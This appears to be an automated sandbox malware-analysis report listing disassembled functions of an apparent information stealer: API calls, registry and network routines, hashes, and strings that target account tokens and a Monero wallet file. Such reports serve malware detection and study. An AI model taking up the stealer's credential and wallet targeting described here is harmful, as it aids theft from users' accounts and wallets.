Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 2da21b2d1986eadc76c413a321f654f2d08f60426d8d562b229a218815e02e57
Instruction ID: cd74ca185ab6b71ce0868fdd8654ac78ebbfe03eb0c6363bd01bdac816f83015
Opcode Fuzzy Hash: 2da21b2d1986eadc76c413a321f654f2d08f60426d8d562b229a218815e02e57
Instruction Fuzzy Hash: 55B179739106189BCF06FBA0EE96EEE773DAF14300F404119F506AA191EF346E49DB62

Function 003D4780 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00E6F138), ref: 003D47DB

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4801
lstrcat.KERNEL32(?,?), ref: 003D4820
lstrcat.KERNEL32(?,?), ref: 003D4834
lstrcat.KERNEL32(?,00E5C6D8), ref: 003D4847
lstrcat.KERNEL32(?,?), ref: 003D485B
lstrcat.KERNEL32(?,00E6EB58), ref: 003D486F

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003D8D90: GetFileAttributesA.KERNEL32(00000000,?,003C1B54,?,?,003E564C,?,?,003E0E1F), ref: 003D8D9F

Part of subcall function 003D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003D4580
Part of subcall function 003D4570: RtlAllocateHeap.NTDLL(00000000), ref: 003D4587
Part of subcall function 003D4570: wsprintfA.USER32 ref: 003D45A6
Part of subcall function 003D4570: FindFirstFileA.KERNEL32(?,?), ref: 003D45BD

Strings

X, xrefs: 003D4861

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: X
API String ID: 2540262943-1677210272
Opcode ID: 51d734c3b1caa8fac121f9211a3b961a1bb0d3e442dd66d28266a6b1fb3a20d8
Instruction ID: 5f8d3aec35f4e302ab0279056ca1f46ed47678d17486122f922025f4a8def6c2
Opcode Fuzzy Hash: 51d734c3b1caa8fac121f9211a3b961a1bb0d3e442dd66d28266a6b1fb3a20d8
Instruction Fuzzy Hash: 7231A2B794030867CB11FBB0EC85EEE737DAB48300F40558AB3599A181EE70E789CB91

Function 003D40B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00E6EA98,00000000,00020119,?), ref: 003D40F4
RegQueryValueExA.ADVAPI32(?,00E6F1C8,00000000,00000000,00000000,000000FF), ref: 003D4118
RegCloseKey.ADVAPI32(?), ref: 003D4122
lstrcat.KERNEL32(?,00000000), ref: 003D4147
lstrcat.KERNEL32(?,00E6EF70), ref: 003D415B

Strings

p, xrefs: 003D414D

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID: p
API String ID: 690832082-2678736219
Opcode ID: 2f6993ec3e06701f5efbe1769a8c2a88800ee871c7fceeff0465dfa5eec432a5
Instruction ID: 0345eb560fd98f5b741abb7166dd32dcec4d4572548ecea9a6674062a3b6b727
Opcode Fuzzy Hash: 2f6993ec3e06701f5efbe1769a8c2a88800ee871c7fceeff0465dfa5eec432a5
Instruction Fuzzy Hash: E441DAB7D402086BDB15EBE0EC46FFE333DBB48300F00455DB6159A181EA759F888B92

Function 003CA0A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00E6A0B8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 003CA0BD
LoadLibraryA.KERNEL32(00E6E838), ref: 003CA146

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

SetEnvironmentVariableA.KERNEL32(00E6A0B8,00000000,00000000,?,003E12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,003E0AFE), ref: 003CA132

Strings

8, xrefs: 003CA140
X, xrefs: 003CA1C8
C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 003CA0B2, 003CA0C6, 003CA0DC

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: 8$C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$X
API String ID: 2929475105-2729768432
Opcode ID: aca0384a6577a3c6c0fbc5589f1cc721de0e0baf03bbfeff8fe0fcb8223c57a0
Instruction ID: e844475c694fc982d143083deac8e1941b1ff83d261aed551f1f827d0359b995
Opcode Fuzzy Hash: aca0384a6577a3c6c0fbc5589f1cc721de0e0baf03bbfeff8fe0fcb8223c57a0
Instruction Fuzzy Hash: 07417AB1861714AFCB0ADFE4ED85FAB37BABB08341F085129E401972A0DB365944CF63

Function 003C4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003C4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 003C4FD1
InternetOpenA.WININET(003E0DDF,00000000,00000000,00000000,00000000), ref: 003C4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003C5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 003C5041
InternetCloseHandle.WININET(?), ref: 003C50B9
InternetCloseHandle.WININET(?), ref: 003C50C6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 4315366386e3d2f91162615d03e2b20b3accf5d31099da8b3e3992cc85213c14
Instruction ID: 0ce2d26a98ce1166616d7951147d0def68b67bad84f9a6a91b22cdba97675db7
Opcode Fuzzy Hash: 4315366386e3d2f91162615d03e2b20b3accf5d31099da8b3e3992cc85213c14
Instruction Fuzzy Hash: 703118B4A40228EBDB20CF94DC85BDDB7B5EB48704F1085D9FA09A7281D7706EC58F99

Function 003D83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003D8426
wsprintfA.USER32 ref: 003D8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003D847B
RegCloseKey.ADVAPI32(00000000), ref: 003D848C
RegCloseKey.ADVAPI32(00000000), ref: 003D8499

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

RegQueryValueExA.KERNEL32(00000000,00E6EE20,00000000,000F003F,?,00000400), ref: 003D84EC
lstrlen.KERNEL32(?), ref: 003D8501
RegQueryValueExA.KERNEL32(00000000,00E6EE38,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003E0B34), ref: 003D8599
RegCloseKey.KERNEL32(00000000), ref: 003D8608
RegCloseKey.ADVAPI32(00000000), ref: 003D861A

Strings

%s\%s, xrefs: 003D844D

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: e288f721bd0db1b48f80a47e5eb315ce77b60c9508a8af8721f41924f0ee4e1c
Instruction ID: 77bf297c399d69f12654485157c9e58f943ae36a02f9819e6aaeb10f99e00fd3
Opcode Fuzzy Hash: e288f721bd0db1b48f80a47e5eb315ce77b60c9508a8af8721f41924f0ee4e1c
Instruction Fuzzy Hash: ED211972950228ABDB24DF54DC85FE9B3B9FB48700F00C1D9E609A6280DF71AA85CFD4

Function 003D7E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7E37
RtlAllocateHeap.NTDLL(00000000), ref: 003D7E3E
RegOpenKeyExA.KERNEL32(80000002,00E5CE10,00000000,00020119,?), ref: 003D7E5E
RegQueryValueExA.KERNEL32(?,00E6E938,00000000,00000000,000000FF,000000FF), ref: 003D7E7F
RegCloseKey.ADVAPI32(?), ref: 003D7E92

Strings

8, xrefs: 003D7E74

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: 8
API String ID: 3225020163-3897458245
Opcode ID: 608d90d66d088fef8a670a29c3f8003a7b0b59952618fa8f55c0d942f890bfae
Instruction ID: 2b3e42603957f89264768092e24ff0ba36760f8b70ab504437e549412f977e96
Opcode Fuzzy Hash: 608d90d66d088fef8a670a29c3f8003a7b0b59952618fa8f55c0d942f890bfae
Instruction Fuzzy Hash: 961151B2A84305EBD705CFD4ED49FBBBBBDEB44750F10825AF605A7680D77458008BA1

Function 003D7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7734
RtlAllocateHeap.NTDLL(00000000), ref: 003D773B
RegOpenKeyExA.KERNEL32(80000002,00E5D2E0,00000000,00020119,003D76B9), ref: 003D775B
RegQueryValueExA.KERNEL32(003D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003D777A
RegCloseKey.ADVAPI32(003D76B9), ref: 003D7784

Strings

CurrentBuildNumber, xrefs: 003D7771

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
